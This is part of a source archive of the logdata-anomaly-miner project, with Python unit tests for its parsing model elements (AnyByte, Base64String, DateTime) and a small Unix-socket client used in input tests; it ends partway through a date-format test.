self.assertTrue(not simple_multisource_atom_sync.receive_atom(log_atom2)) sleep(sync_wait_time + 1) self.assertTrue(not simple_multisource_atom_sync.receive_atom(log_atom2)) self.assertEqual(simple_multisource_atom_sync.sources_dict, { new_match_path_detector1: [log_atom1.get_timestamp(), None], new_match_path_detector2: [log_atom2.get_timestamp(), log_atom2]}) self.assertTrue(simple_multisource_atom_sync.receive_atom(log_atom1)) self.assertTrue(simple_multisource_atom_sync.receive_atom(log_atom1)) sleep(sync_wait_time + 1) self.assertTrue(simple_multisource_atom_sync.receive_atom(log_atom1)) self.assertEqual(simple_multisource_atom_sync.sources_dict, { new_match_path_detector1: [log_atom1.get_timestamp(), None], new_match_path_detector2: [log_atom2.get_timestamp(), log_atom2]}) log_atom1 = LogAtom(match_element.match_object, ParserMatch(match_element), t + 1, new_match_path_detector1) self.assertTrue(not simple_multisource_atom_sync.receive_atom(log_atom1)) self.assertEqual(simple_multisource_atom_sync.sources_dict, { new_match_path_detector1: [log_atom1.get_timestamp() - 1, log_atom1], new_match_path_detector2: [log_atom2.get_timestamp(), log_atom2]}) log_atom1 = LogAtom(match_element.match_object, ParserMatch(match_element), t - 1, new_match_path_detector1) self.assertTrue(simple_multisource_atom_sync.receive_atom(log_atom1)) if __name__ == "__main__": unittest.main() logdata-anomaly-miner-2.6.1/aecid-testsuite/unit/input/__init__.py000066400000000000000000000000001437606560100252220ustar00rootroot00000000000000logdata-anomaly-miner-2.6.1/aecid-testsuite/unit/input/client.py000066400000000000000000000003461437606560100247560ustar00rootroot00000000000000from time import sleep import socket sock_name = '/tmp/test5unixSocket.sock' # skipcq: BAN-B108 sleep(0.5) client = socket.socket(socket.AF_UNIX, socket.SOCK_STREAM) client.connect(sock_name) client.send(b'data') client.close() 
logdata-anomaly-miner-2.6.1/aecid-testsuite/unit/parsing/000077500000000000000000000000001437606560100234275ustar00rootroot00000000000000logdata-anomaly-miner-2.6.1/aecid-testsuite/unit/parsing/AnyByteDataModelElementTest.py000066400000000000000000000101661437606560100313050ustar00rootroot00000000000000import unittest from aminer.parsing.AnyByteDataModelElement import AnyByteDataModelElement from aminer.parsing.MatchContext import MatchContext from aminer.parsing.MatchElement import MatchElement from unit.TestBase import TestBase, DummyMatchContext class AnyByteDataModelElementTest(TestBase): """Unittests for the AnyByteDataModelElement.""" id_ = "any" path = "path" def test1get_match_element_valid_match(self): """Parse matching substring from MatchContext and check if the MatchContext was updated with all characters.""" data = b"abcdefghijklmnopqrstuvwxyz.!?" match_context = DummyMatchContext(data) any_dme = AnyByteDataModelElement(self.id_) match_element = any_dme.get_match_element(self.path, match_context) self.compare_match_results(data, match_element, match_context, self.id_, self.path, data, data, None) def test2get_match_element_no_match(self): """Parse not matching substring from MatchContext and check if the MatchContext was not changed.""" data = b"" match_context = DummyMatchContext(data) any_dme = AnyByteDataModelElement(self.id_) match_element = any_dme.get_match_element(self.path, match_context) self.compare_no_match_results(data, match_element, match_context) def test3element_id_input_validation(self): """Check if element_id is validated.""" self.assertRaises(ValueError, AnyByteDataModelElement, "") # empty element_id self.assertRaises(TypeError, AnyByteDataModelElement, None) # None element_id self.assertRaises(TypeError, AnyByteDataModelElement, b"path") # bytes element_id is not allowed self.assertRaises(TypeError, AnyByteDataModelElement, True) # boolean element_id is not allowed self.assertRaises(TypeError, AnyByteDataModelElement, 123) # 
integer element_id is not allowed self.assertRaises(TypeError, AnyByteDataModelElement, 123.22) # float element_id is not allowed self.assertRaises(TypeError, AnyByteDataModelElement, {"id": "path"}) # dict element_id is not allowed self.assertRaises(TypeError, AnyByteDataModelElement, ["path"]) # list element_id is not allowed self.assertRaises(TypeError, AnyByteDataModelElement, []) # empty list element_id is not allowed self.assertRaises(TypeError, AnyByteDataModelElement, ()) # empty tuple element_id is not allowed self.assertRaises(TypeError, AnyByteDataModelElement, set()) # empty set element_id is not allowed def test4get_match_element_match_context_input_validation(self): """Check if an exception is raised, when other classes than MatchContext are used in get_match_element.""" model_element = AnyByteDataModelElement(self.id_) data = b"abcdefghijklmnopqrstuvwxyz.!?" model_element.get_match_element(self.path, DummyMatchContext(data)) model_element.get_match_element(self.path, MatchContext(data)) self.assertRaises(AttributeError, model_element.get_match_element, self.path, MatchElement(self.path, data, None, None)) self.assertRaises(AttributeError, model_element.get_match_element, self.path, data) self.assertRaises(AttributeError, model_element.get_match_element, self.path, data.decode()) self.assertRaises(AttributeError, model_element.get_match_element, self.path, 123) self.assertRaises(AttributeError, model_element.get_match_element, self.path, 123.22) self.assertRaises(AttributeError, model_element.get_match_element, self.path, True) self.assertRaises(AttributeError, model_element.get_match_element, self.path, None) self.assertRaises(AttributeError, model_element.get_match_element, self.path, []) self.assertRaises(AttributeError, model_element.get_match_element, self.path, {"key": MatchContext(data)}) self.assertRaises(AttributeError, model_element.get_match_element, self.path, set()) self.assertRaises(AttributeError, model_element.get_match_element, 
self.path, ()) self.assertRaises(AttributeError, model_element.get_match_element, self.path, model_element) if __name__ == "__main__": unittest.main() logdata-anomaly-miner-2.6.1/aecid-testsuite/unit/parsing/Base64StringModelElementTest.py000066400000000000000000000477031437606560100313620ustar00rootroot00000000000000import unittest from aminer.parsing.Base64StringModelElement import Base64StringModelElement from aminer.parsing.MatchContext import MatchContext from aminer.parsing.MatchElement import MatchElement from unit.TestBase import TestBase, DummyMatchContext class Base64StringModelElementTest(TestBase): """Unittests for the Base64StringModelElement.""" id_ = "base64" path = "path" def test1get_match_element_valid_match_string_with_padding(self): """Parse matching substring with padding from MatchContext and check if the MatchContext was updated with all base64 data.""" string = b"This is some string to be encoded." base64_string = b"VGhpcyBpcyBzb21lIHN0cmluZyB0byBiZSBlbmNvZGVkLg==" match_context = DummyMatchContext(base64_string) base64_dme = Base64StringModelElement(self.id_) match_element = base64_dme.get_match_element(self.path, match_context) self.compare_match_results(base64_string, match_element, match_context, self.id_, self.path, base64_string, string, None) def test2get_match_element_valid_match_string_with_one_byte_padding(self): """Parse matching substring with padding from MatchContext and check if the MatchContext was updated with all base64 data.""" string = b"This is some encoded strin" base64_string = b"VGhpcyBpcyBzb21lIGVuY29kZWQgc3RyaW4=" match_context = DummyMatchContext(base64_string) base64_dme = Base64StringModelElement(self.id_) match_element = base64_dme.get_match_element(self.path, match_context) self.compare_match_results(base64_string, match_element, match_context, self.id_, self.path, base64_string, string, None) def test3get_match_element_valid_match_string_without_padding(self): """Parse matching substring without padding from 
MatchContext and check if the MatchContext was updated with all base64 data.""" string = b"This is some string to be encoded without the padding character =." base64_string = b"VGhpcyBpcyBzb21lIHN0cmluZyB0byBiZSBlbmNvZGVkIHdpdGhvdXQgdGhlIHBhZGRpbmcgY2hhcmFjdGVyID0u" match_context = DummyMatchContext(base64_string) base64_dme = Base64StringModelElement(self.id_) match_element = base64_dme.get_match_element(self.path, match_context) self.compare_match_results(base64_string, match_element, match_context, self.id_, self.path, base64_string, string, None) def test4get_match_element_valid_match_string_without_exact_length(self): """Parse matching substring without exact length (divisible by 4) and check if the MatchContext was updated with all base64 data.""" string = b"This is some encoded strin" base64_string = b"VGhpcyBpcyBzb21lIGVuY29kZWQgc3RyaW4" match_context = DummyMatchContext(base64_string) base64_dme = Base64StringModelElement(self.id_) match_element = base64_dme.get_match_element(self.path, match_context) self.compare_match_results( base64_string, match_element, match_context, self.id_, self.path, base64_string[:-(len(base64_string) % 4)], string[:-2], None) def test5get_match_element_valid_match_string_with_partial_length(self): """Parse matching substring out of the MatchContext and check if the MatchContext was updated with all base64 data.""" string = b"This is some encoded strin" base64_string = b"VGhpcyBpcyBzb21lIGVuY29kZWQgc3RyaW4=" data = base64_string + b"\nContent: Public Key" match_context = DummyMatchContext(data) base64_dme = Base64StringModelElement(self.id_) match_element = base64_dme.get_match_element(self.path, match_context) self.compare_match_results(data, match_element, match_context, self.id_, self.path, base64_string, string, None) def test6get_match_element_no_match(self): """Parse not matching substring from MatchContext and check if the MatchContext was not changed.""" base64_dme = Base64StringModelElement(self.id_) data = b"!Hello 
World" match_context = DummyMatchContext(data) match_element = base64_dme.get_match_element(self.path, match_context) self.compare_no_match_results(data, match_element, match_context) data = b"\x90\x90Hello World" match_context = DummyMatchContext(data) match_element = base64_dme.get_match_element(self.path, match_context) self.compare_no_match_results(data, match_element, match_context) def test7get_match_element_unicode_exception(self): """Parse a Base64 string which can not be decoded as UTF-8, so it has to be returned base64 encoded.""" # ² encoded with ISO-8859-1 base64_string = b"sg==" match_context = DummyMatchContext(base64_string) base64_dme = Base64StringModelElement(self.id_) match_element = base64_dme.get_match_element(self.path, match_context) self.compare_match_results(base64_string, match_element, match_context, self.id_, self.path, base64_string, base64_string, None) def test8element_id_input_validation(self): """Check if element_id is validated.""" self.assertRaises(ValueError, Base64StringModelElement, "") # empty element_id self.assertRaises(TypeError, Base64StringModelElement, None) # None element_id self.assertRaises(TypeError, Base64StringModelElement, b"path") # bytes element_id is not allowed self.assertRaises(TypeError, Base64StringModelElement, True) # boolean element_id is not allowed self.assertRaises(TypeError, Base64StringModelElement, 123) # integer element_id is not allowed self.assertRaises(TypeError, Base64StringModelElement, 123.22) # float element_id is not allowed self.assertRaises(TypeError, Base64StringModelElement, {"id": "path"}) # dict element_id is not allowed self.assertRaises(TypeError, Base64StringModelElement, ["path"]) # list element_id is not allowed self.assertRaises(TypeError, Base64StringModelElement, []) # empty list element_id is not allowed self.assertRaises(TypeError, Base64StringModelElement, ()) # empty tuple element_id is not allowed self.assertRaises(TypeError, Base64StringModelElement, set()) # empty set 
element_id is not allowed def test9get_match_element_match_context_input_validation(self): """Check if an exception is raised, when other classes than MatchContext are used in get_match_element.""" model_element = Base64StringModelElement(self.id_) data = b"VGhpcyBpcyBzb21lIHN0cmluZyB0byBiZSBlbmNvZGVkLg==" model_element.get_match_element(self.path, DummyMatchContext(data)) model_element.get_match_element(self.path, MatchContext(data)) self.assertRaises(AttributeError, model_element.get_match_element, self.path, MatchElement(self.path, data, None, None)) self.assertRaises(AttributeError, model_element.get_match_element, self.path, data) self.assertRaises(AttributeError, model_element.get_match_element, self.path, data.decode()) self.assertRaises(AttributeError, model_element.get_match_element, self.path, 123) self.assertRaises(AttributeError, model_element.get_match_element, self.path, 123.22) self.assertRaises(AttributeError, model_element.get_match_element, self.path, True) self.assertRaises(AttributeError, model_element.get_match_element, self.path, None) self.assertRaises(AttributeError, model_element.get_match_element, self.path, []) self.assertRaises(AttributeError, model_element.get_match_element, self.path, {"key": MatchContext(data)}) self.assertRaises(AttributeError, model_element.get_match_element, self.path, set()) self.assertRaises(AttributeError, model_element.get_match_element, self.path, ()) self.assertRaises(AttributeError, model_element.get_match_element, self.path, model_element) def test10performance(self): # skipcq: PYL-R0201 """Test the performance of the implementation. Comment this test out in normal cases.""" import_setup = """ import copy from unit.TestBase import DummyMatchContext from aminer.parsing.Base64StringModelElement import Base64StringModelElement times = 100000 """ string100_setup = """ # b"ASCII stands for American Standard Code for Information Interchange. Computers can only understand." 
base64_string = b"QVNDSUkgc3RhbmRzIGZvciBBbWVyaWNhbiBTdGFuZGFyZCBDb2RlIGZvciBJbmZvcm1hdGlvbiBJbnRlcmNoYW5nZS4gQ29tcHV0ZXJzIGNhb" \ b"iBvbmx5IHVuZGVyc3RhbmQu" """ string4096_setup = """ # b"ASCII stands for American Standard Code for Information Interchange. Computers can only understand numbers, so an ASCII code " \ # b"is the numerical representation of a character such as "a" or "@" or an action of some sort. ASCII was developed a long time " \ # b"ago and now the non-printing characters are rarely used for their original purpose. Below is the ASCII character table and " \ # b"this includes descriptions of the first 32 non-printing characters. ASCII was actually designed for use with teletypes and " \ # b"so the descriptions are somewhat obscure. If someone says they want your CV however in ASCII format, all this means is they " \ # b"want "plain" text with no formatting such as tabs, bold or underscoring - the raw format that any computer can understand. " \ # b"This is usually so they can easily import the file into their own applications without issues. Notepad.exe creates ASCII " \ # b"text, or in MS Word you can save a file as "text only"ASCII stands for American Standard Code for Information Interchange. " \ # b"Computers can only understand numbers, so an ASCII code is the numerical representation of a character such as "a" or "@" " \ # b"or an action of some sort. ASCII was developed a long time ago and now the non-printing characters are rarely used for their " \ # b"original purpose. Below is the ASCII character table and this includes descriptions of the first 32 non-printing characters. " \ # b"ASCII was actually designed for use with teletypes and so the descriptions are somewhat obscure. If someone says they want " \ # b"your CV however in ASCII format, all this means is they want "plain" text with no formatting such as tabs, bold or " \ # b"underscoring - the raw format that any computer can understand. 
This is usually so they can easily import the file into " \ # b"their own applications without issues. Notepad.exe creates ASCII text, or in MS Word you can save a file as "text only"" \ # b"ASCII stands for American Standard Code for Information Interchange. Computers can only understand numbers, so an ASCII " \ # b"code is the numerical representation of a character such as "a" or "@" or an action of some sort. ASCII was developed a " \ # b"long time ago and now the non-printing characters are rarely used for their original purpose. Below is the ASCII " \ # b"character table and this includes descriptions of the first 32 non-printing characters. ASCII was actually designed for " \ # b"use with teletypes and so the descriptions are somewhat obscure. If someone says they want your CV however in ASCII format, " \ # b"all this means is they want "plain" text with no formatting such as tabs, bold or underscoring - the raw format that any " \ # b"computer can understand. This is usually so they can easily import the file into their own applications without issues. " \ # b"Notepad.exe creates ASCII text, or in MS Word you can save a file as "text only"ASCII stands for American Standard Code for " \ # b"Information Interchange. Computers can only understand numbers, so an ASCII code is the numerical representation of a " \ # b"character such as "a" or "@" or an action of some sort. ASCII was developed a long time ago and now the non-printing " \ # b"characters are rarely used for their original purpose. Below is the ASCII character table and this includes descriptions " \ # b"of the first 32 non-printing characters. ASCII was actually designed for use with teletypes and so the descriptions are " \ # b"somewhat obscure. If someone says they want your CV however in ASCII format, all this means is they want "plain" text with " \ # b"no formatting such as tabs, bold or underscoring - the raw format that any computer can understand. 
This is usually so they " \ # b"can easily import the file into their own applications without issues. Notepad.exe creates ASCII text, or in MS Word you " \ # b"can save a file as "text only"ASCII stands for American Standard Code for Information Interchange. Computers can only " \ # b"understand numbers, so an ASCII code is the numerical representation of a character such as "a" or "@" or an action of " \ # b"some sort. ASCII was developed a long time ago and now the non-printing characters are rarely used for their original " \ # b"purpose. Below is the ASCII character table and this includes descriptions of the first 32 non-prin" base64_string = b"QVNDSUkgc3RhbmRzIGZvciBBbWVyaWNhbiBTdGFuZGFyZCBDb2RlIGZvciBJbmZvcm1hdGlvbiBJbnRlcmNoYW5nZS4gQ29tcHV0ZXJzIGNhbiBvbmx5IHV" \ b"uZGVyc3RhbmQgbnVtYmVycywgc28gYW4gQVNDSUkgY29kZSBpcyB0aGUgbnVtZXJpY2FsIHJlcHJlc2VudGF0aW9uIG9mIGEgY2hhcmFjdGVyIHN1Y2ggYX" \ b"MgJ2EnIG9yICdAJyBvciBhbiBhY3Rpb24gb2Ygc29tZSBzb3J0LiBBU0NJSSB3YXMgZGV2ZWxvcGVkIGEgbG9uZyB0aW1lIGFnbyBhbmQgbm93IHRoZSBub" \ b"24tcHJpbnRpbmcgY2hhcmFjdGVycyBhcmUgcmFyZWx5IHVzZWQgZm9yIHRoZWlyIG9yaWdpbmFsIHB1cnBvc2UuIEJlbG93IGlzIHRoZSBBU0NJSSBjaGFy" \ b"YWN0ZXIgdGFibGUgYW5kIHRoaXMgaW5jbHVkZXMgZGVzY3JpcHRpb25zIG9mIHRoZSBmaXJzdCAzMiBub24tcHJpbnRpbmcgY2hhcmFjdGVycy4gQVNDSUk" \ b"gd2FzIGFjdHVhbGx5IGRlc2lnbmVkIGZvciB1c2Ugd2l0aCB0ZWxldHlwZXMgYW5kIHNvIHRoZSBkZXNjcmlwdGlvbnMgYXJlIHNvbWV3aGF0IG9ic2N1cm" \ b"UuIElmIHNvbWVvbmUgc2F5cyB0aGV5IHdhbnQgeW91ciBDViBob3dldmVyIGluIEFTQ0lJIGZvcm1hdCwgYWxsIHRoaXMgbWVhbnMgaXMgdGhleSB3YW50I" \ b"CdwbGFpbicgdGV4dCB3aXRoIG5vIGZvcm1hdHRpbmcgc3VjaCBhcyB0YWJzLCBib2xkIG9yIHVuZGVyc2NvcmluZyAtIHRoZSByYXcgZm9ybWF0IHRoYXQg" \ b"YW55IGNvbXB1dGVyIGNhbiB1bmRlcnN0YW5kLiBUaGlzIGlzIHVzdWFsbHkgc28gdGhleSBjYW4gZWFzaWx5IGltcG9ydCB0aGUgZmlsZSBpbnRvIHRoZWl" \ b"yIG93biBhcHBsaWNhdGlvbnMgd2l0aG91dCBpc3N1ZXMuIE5vdGVwYWQuZXhlIGNyZWF0ZXMgQVNDSUkgdGV4dCwgb3IgaW4gTVMgV29yZCB5b3UgY2FuIH" \ 
b"NhdmUgYSBmaWxlIGFzICd0ZXh0IG9ubHknQVNDSUkgc3RhbmRzIGZvciBBbWVyaWNhbiBTdGFuZGFyZCBDb2RlIGZvciBJbmZvcm1hdGlvbiBJbnRlcmNoY" \ b"W5nZS4gQ29tcHV0ZXJzIGNhbiBvbmx5IHVuZGVyc3RhbmQgbnVtYmVycywgc28gYW4gQVNDSUkgY29kZSBpcyB0aGUgbnVtZXJpY2FsIHJlcHJlc2VudGF0" \ b"aW9uIG9mIGEgY2hhcmFjdGVyIHN1Y2ggYXMgJ2EnIG9yICdAJyBvciBhbiBhY3Rpb24gb2Ygc29tZSBzb3J0LiBBU0NJSSB3YXMgZGV2ZWxvcGVkIGEgbG9" \ b"uZyB0aW1lIGFnbyBhbmQgbm93IHRoZSBub24tcHJpbnRpbmcgY2hhcmFjdGVycyBhcmUgcmFyZWx5IHVzZWQgZm9yIHRoZWlyIG9yaWdpbmFsIHB1cnBvc2" \ b"UuIEJlbG93IGlzIHRoZSBBU0NJSSBjaGFyYWN0ZXIgdGFibGUgYW5kIHRoaXMgaW5jbHVkZXMgZGVzY3JpcHRpb25zIG9mIHRoZSBmaXJzdCAzMiBub24tc" \ b"HJpbnRpbmcgY2hhcmFjdGVycy4gQVNDSUkgd2FzIGFjdHVhbGx5IGRlc2lnbmVkIGZvciB1c2Ugd2l0aCB0ZWxldHlwZXMgYW5kIHNvIHRoZSBkZXNjcmlw" \ b"dGlvbnMgYXJlIHNvbWV3aGF0IG9ic2N1cmUuIElmIHNvbWVvbmUgc2F5cyB0aGV5IHdhbnQgeW91ciBDViBob3dldmVyIGluIEFTQ0lJIGZvcm1hdCwgYWx" \ b"sIHRoaXMgbWVhbnMgaXMgdGhleSB3YW50ICdwbGFpbicgdGV4dCB3aXRoIG5vIGZvcm1hdHRpbmcgc3VjaCBhcyB0YWJzLCBib2xkIG9yIHVuZGVyc2Nvcm" \ b"luZyAtIHRoZSByYXcgZm9ybWF0IHRoYXQgYW55IGNvbXB1dGVyIGNhbiB1bmRlcnN0YW5kLiBUaGlzIGlzIHVzdWFsbHkgc28gdGhleSBjYW4gZWFzaWx5I" \ b"GltcG9ydCB0aGUgZmlsZSBpbnRvIHRoZWlyIG93biBhcHBsaWNhdGlvbnMgd2l0aG91dCBpc3N1ZXMuIE5vdGVwYWQuZXhlIGNyZWF0ZXMgQVNDSUkgdGV4" \ b"dCwgb3IgaW4gTVMgV29yZCB5b3UgY2FuIHNhdmUgYSBmaWxlIGFzICd0ZXh0IG9ubHknQVNDSUkgc3RhbmRzIGZvciBBbWVyaWNhbiBTdGFuZGFyZCBDb2R" \ b"lIGZvciBJbmZvcm1hdGlvbiBJbnRlcmNoYW5nZS4gQ29tcHV0ZXJzIGNhbiBvbmx5IHVuZGVyc3RhbmQgbnVtYmVycywgc28gYW4gQVNDSUkgY29kZSBpcy" \ b"B0aGUgbnVtZXJpY2FsIHJlcHJlc2VudGF0aW9uIG9mIGEgY2hhcmFjdGVyIHN1Y2ggYXMgJ2EnIG9yICdAJyBvciBhbiBhY3Rpb24gb2Ygc29tZSBzb3J0L" \ b"iBBU0NJSSB3YXMgZGV2ZWxvcGVkIGEgbG9uZyB0aW1lIGFnbyBhbmQgbm93IHRoZSBub24tcHJpbnRpbmcgY2hhcmFjdGVycyBhcmUgcmFyZWx5IHVzZWQg" \ b"Zm9yIHRoZWlyIG9yaWdpbmFsIHB1cnBvc2UuIEJlbG93IGlzIHRoZSBBU0NJSSBjaGFyYWN0ZXIgdGFibGUgYW5kIHRoaXMgaW5jbHVkZXMgZGVzY3JpcHR" \ b"pb25zIG9mIHRoZSBmaXJzdCAzMiBub24tcHJpbnRpbmcgY2hhcmFjdGVycy4gQVNDSUkgd2FzIGFjdHVhbGx5IGRlc2lnbmVkIGZvciB1c2Ugd2l0aCB0ZW" \ 
b"xldHlwZXMgYW5kIHNvIHRoZSBkZXNjcmlwdGlvbnMgYXJlIHNvbWV3aGF0IG9ic2N1cmUuIElmIHNvbWVvbmUgc2F5cyB0aGV5IHdhbnQgeW91ciBDViBob" \ b"3dldmVyIGluIEFTQ0lJIGZvcm1hdCwgYWxsIHRoaXMgbWVhbnMgaXMgdGhleSB3YW50ICdwbGFpbicgdGV4dCB3aXRoIG5vIGZvcm1hdHRpbmcgc3VjaCBh" \ b"cyB0YWJzLCBib2xkIG9yIHVuZGVyc2NvcmluZyAtIHRoZSByYXcgZm9ybWF0IHRoYXQgYW55IGNvbXB1dGVyIGNhbiB1bmRlcnN0YW5kLiBUaGlzIGlzIHV" \ b"zdWFsbHkgc28gdGhleSBjYW4gZWFzaWx5IGltcG9ydCB0aGUgZmlsZSBpbnRvIHRoZWlyIG93biBhcHBsaWNhdGlvbnMgd2l0aG91dCBpc3N1ZXMuIE5vdG" \ b"VwYWQuZXhlIGNyZWF0ZXMgQVNDSUkgdGV4dCwgb3IgaW4gTVMgV29yZCB5b3UgY2FuIHNhdmUgYSBmaWxlIGFzICd0ZXh0IG9ubHknQVNDSUkgc3RhbmRzI" \ b"GZvciBBbWVyaWNhbiBTdGFuZGFyZCBDb2RlIGZvciBJbmZvcm1hdGlvbiBJbnRlcmNoYW5nZS4gQ29tcHV0ZXJzIGNhbiBvbmx5IHVuZGVyc3RhbmQgbnVt" \ b"YmVycywgc28gYW4gQVNDSUkgY29kZSBpcyB0aGUgbnVtZXJpY2FsIHJlcHJlc2VudGF0aW9uIG9mIGEgY2hhcmFjdGVyIHN1Y2ggYXMgJ2EnIG9yICdAJyB" \ b"vciBhbiBhY3Rpb24gb2Ygc29tZSBzb3J0LiBBU0NJSSB3YXMgZGV2ZWxvcGVkIGEgbG9uZyB0aW1lIGFnbyBhbmQgbm93IHRoZSBub24tcHJpbnRpbmcgY2" \ b"hhcmFjdGVycyBhcmUgcmFyZWx5IHVzZWQgZm9yIHRoZWlyIG9yaWdpbmFsIHB1cnBvc2UuIEJlbG93IGlzIHRoZSBBU0NJSSBjaGFyYWN0ZXIgdGFibGUgY" \ b"W5kIHRoaXMgaW5jbHVkZXMgZGVzY3JpcHRpb25zIG9mIHRoZSBmaXJzdCAzMiBub24tcHJpbnRpbmcgY2hhcmFjdGVycy4gQVNDSUkgd2FzIGFjdHVhbGx5" \ b"IGRlc2lnbmVkIGZvciB1c2Ugd2l0aCB0ZWxldHlwZXMgYW5kIHNvIHRoZSBkZXNjcmlwdGlvbnMgYXJlIHNvbWV3aGF0IG9ic2N1cmUuIElmIHNvbWVvbmU" \ b"gc2F5cyB0aGV5IHdhbnQgeW91ciBDViBob3dldmVyIGluIEFTQ0lJIGZvcm1hdCwgYWxsIHRoaXMgbWVhbnMgaXMgdGhleSB3YW50ICdwbGFpbicgdGV4dC" \ b"B3aXRoIG5vIGZvcm1hdHRpbmcgc3VjaCBhcyB0YWJzLCBib2xkIG9yIHVuZGVyc2NvcmluZyAtIHRoZSByYXcgZm9ybWF0IHRoYXQgYW55IGNvbXB1dGVyI" \ b"GNhbiB1bmRlcnN0YW5kLiBUaGlzIGlzIHVzdWFsbHkgc28gdGhleSBjYW4gZWFzaWx5IGltcG9ydCB0aGUgZmlsZSBpbnRvIHRoZWlyIG93biBhcHBsaWNh" \ b"dGlvbnMgd2l0aG91dCBpc3N1ZXMuIE5vdGVwYWQuZXhlIGNyZWF0ZXMgQVNDSUkgdGV4dCwgb3IgaW4gTVMgV29yZCB5b3UgY2FuIHNhdmUgYSBmaWxlIGF" \ b"zICd0ZXh0IG9ubHknQVNDSUkgc3RhbmRzIGZvciBBbWVyaWNhbiBTdGFuZGFyZCBDb2RlIGZvciBJbmZvcm1hdGlvbiBJbnRlcmNoYW5nZS4gQ29tcHV0ZX" \ 
b"JzIGNhbiBvbmx5IHVuZGVyc3RhbmQgbnVtYmVycywgc28gYW4gQVNDSUkgY29kZSBpcyB0aGUgbnVtZXJpY2FsIHJlcHJlc2VudGF0aW9uIG9mIGEgY2hhc" \
b"mFjdGVyIHN1Y2ggYXMgJ2EnIG9yICdAJyBvciBhbiBhY3Rpb24gb2Ygc29tZSBzb3J0LiBBU0NJSSB3YXMgZGV2ZWxvcGVkIGEgbG9uZyB0aW1lIGFnbyBh" \
b"bmQgbm93IHRoZSBub24tcHJpbnRpbmcgY2hhcmFjdGVycyBhcmUgcmFyZWx5IHVzZWQgZm9yIHRoZWlyIG9yaWdpbmFsIHB1cnBvc2UuIEJlbG93IGlzIHR" \
b"oZSBBU0NJSSBjaGFyYWN0ZXIgdGFibGUgYW5kIHRoaXMgaW5jbHVkZXMgZGVzY3JpcHRpb25zIG9mIHRoZSBmaXJzdCAzMiBub24tcHJpbg=="
"""
        # Shared tail of the setup: one pre-built context per timed iteration, so run() does little besides the parse.
        # NOTE(review): list.pop(0) is O(n) on a 100000-element list, so part of the measured time is the list shift.
        end_setup = """
dummy_match_context = DummyMatchContext(base64_string)
dummy_match_context_list = [copy.deepcopy(dummy_match_context) for _ in range(times)]
base64_dme = Base64StringModelElement("s0")
def run():
    match_context = dummy_match_context_list.pop(0)
    base64_dme.get_match_element("base64", match_context)
"""
        _setup100 = import_setup + string100_setup + end_setup
        _setup4096 = import_setup + string4096_setup + end_setup
        # The timing itself stays commented out so a normal test run does not pay for 2 x 100000 parses.
        # import timeit
        # times = 100000
        # print("All text lengths are given from the original text. Base64 encoding needs 33% more characters."
        #       " Every text length is run 100.000 times.")
        # t = timeit.timeit(setup=_setup100, stmt="run()", number=times)
        # print("Text length 100: ", t)
        # t = timeit.timeit(setup=_setup4096, stmt="run()", number=times)
        # print("Text length 4096: ", t)


if __name__ == "__main__":
    unittest.main()
logdata-anomaly-miner-2.6.1/aecid-testsuite/unit/parsing/DateTimeModelElementTest.py000066400000000000000000001254661437606560100306420ustar00rootroot00000000000000
import unittest
import logging
import pytz
import locale
from io import StringIO
from aminer.parsing.DateTimeModelElement import DateTimeModelElement
from aminer.parsing.MatchElement import MatchElement
from aminer.parsing.MatchContext import MatchContext
from unit.TestBase import TestBase, DummyMatchContext, initialize_loggers
from datetime import datetime, timezone
from pwd import getpwnam
from grp import getgrnam


class DateTimeModelElementTest(TestBase):
    """
    Unittests for the DateTimeModelElement.

    To calculate the expected timestamps the timezone shift was added or subtracted from the date and the epoch was calculated on
    https://www.epochconverter.com/. For example the date 24.03.2018 11:40:00 CET was converted to 24.03.2018 10:40:00 UTC and then
    the epoch in seconds was calculated (1521888000).
"""

    id_ = "dtme"
    path = "path"

    def test1get_match_element_with_different_date_formats(self):
        """Match timestamps written in several date_format variants and check the epoch value produced for each."""
        # One element per format string. Inputs listed under the same format are parsed by the same element instance,
        # in order, so whatever state the element keeps between matches is exercised exactly as before.
        cases_per_format = [
            (b"%d.%m.%Y %H:%M:%S", [
                (b"07.02.2019 11:40:00: it still works", b"07.02.2019 11:40:00", 1549539600),
                (b"29.02.2020 11:40:00: it still works", b"29.02.2020 11:40:00", 1582976400),  # leap year
            ]),
            (b"%d.%m.%YT%H:%M:%S", [
                (b"07.02.2019T11:40:00: it still works", b"07.02.2019T11:40:00", 1549539600),
            ]),
            (b"%d.%m.%Y %H:%M:%S.%f", [
                (b"07.02.2019 11:40:00.123456: it still works", b"07.02.2019 11:40:00.123456", 1549539600.123456),
            ]),
            (b"%d.%m.%Y %H:%M:%S%z", [
                (b"07.02.2019 11:40:00+0000: it still works", b"07.02.2019 11:40:00+0000", 1549539600),
                (b"07.02.2019 11:40:00 UTC: it still works", b"07.02.2019 11:40:00 UTC", 1549539600),
                (b"07.02.2019 11:40:00 GMT: it still works", b"07.02.2019 11:40:00 GMT", 1549539600),
                (b"07.02.2019 11:40:00 UTC+01: it still works", b"07.02.2019 11:40:00 UTC+01", 1549536000),
                # wrong timezone identifiers for offsets: only "CET" is part of the match, the "+01" is left over
                (b"07.02.2019 11:40:00 CET+01: it still works", b"07.02.2019 11:40:00 CET", 1549536000),
                # the %z element also matches input that carries no zone information at all
                (b"07.02.2019 11:40:00: it still works", b"07.02.2019 11:40:00", 1549539600),
            ]),
            (b"%d.%m.%Y", [
                (b"07.02.2019: it still works", b"07.02.2019", 1549497600),
            ]),
        ]
        for date_format, cases in cases_per_format:
            element = DateTimeModelElement(self.id_, date_format, timezone.utc)
            for data, date, expected in cases:
                context = DummyMatchContext(data)
                match = element.get_match_element(self.path, context)
                self.compare_match_results(data, match, context, self.id_, self.path, date, expected, None)

        # Time of day only: the epoch value depends on the current date, so only the matched text is pinned here.
        data = b"11:40:23: it still works"
        context = DummyMatchContext(data)
        element = DateTimeModelElement(self.id_, b"%H:%M:%S", timezone.utc)
        match = element.get_match_element(self.path, context)
        self.compare_match_results(data, match, context, self.id_, self.path, b"11:40:23", match.match_object, None)
        self.assertEqual(match.match_string, b"11:40:23")
        self.assertEqual(context.match_string, b"11:40:23")

        # %s: epoch seconds as written, or scaled down when the input carries milli- or microseconds.
        epoch_cases = [
            ({}, b"1662760597", 1662760597),
            ({"timestamp_scale": 1000}, b"1662760597123", 1662760597.123),
            ({"timestamp_scale": 1e6}, b"1662760597123456", 1662760597.123456),
        ]
        for extra_kwargs, data, expected in epoch_cases:
            context = DummyMatchContext(data)
            element = DateTimeModelElement(self.id_, b"%s", timezone.utc, **extra_kwargs)
            match = element.get_match_element(self.path, context)
            # the whole input is the timestamp, so the matched text equals the input
